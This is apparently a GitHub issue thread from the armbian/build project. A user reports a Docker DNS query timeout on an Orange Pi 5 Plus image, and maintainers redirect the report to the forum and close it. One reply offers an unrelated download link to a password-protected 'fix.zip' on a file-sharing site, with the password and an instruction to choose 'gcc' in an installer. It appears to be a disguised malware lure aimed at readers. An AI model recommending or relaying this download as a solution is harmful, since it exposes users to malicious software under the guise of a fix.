armbian/build #7141: [Feature Request]: Network armbian with docker

DavidHenryThoreau, 2024-08-26:
### Which feature would you like to have?

I've installed docker on armbian https://dl.armbian.com/orangepi5-plus/Bookworm_vendor_minimal but I'm getting that error 
```
août 24 12:43:08 user dockerd[1429]: time="2024-08-24T12:43:08.089479936+02:00" level=error msg="[resolver] failed to query external DNS server" client-addr="udp:172.18.0.12:40033" dns-server="udp:172.20.10.1:53" error="read udp 172.18.0.12:40033->172.20.10.1:53: i/o timeout" question=";test.in.domain.lan.\tIN\t AAAA"
```

### Funding

- [ ] [I am willing to cover expenses](https://www.armbian.com/contact/)

abdulhkeemGit, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

SteeManMI, 2024-08-26:
This issue tracker is for issues with the build framework, not for issues with individual board images.  The appropriate place for this is to post this in the OrangePi5 forum at forum.armbian.com

closed 2024-08-26 by SteeManMI

igorpecovnik, 2024-08-26:
also worth checking new release which is coming out today / tomorrow.

DavidHenryThoreau, 2024-08-26:
> also worth checking new release which is coming out today / tomorrow.

Thanks for answer !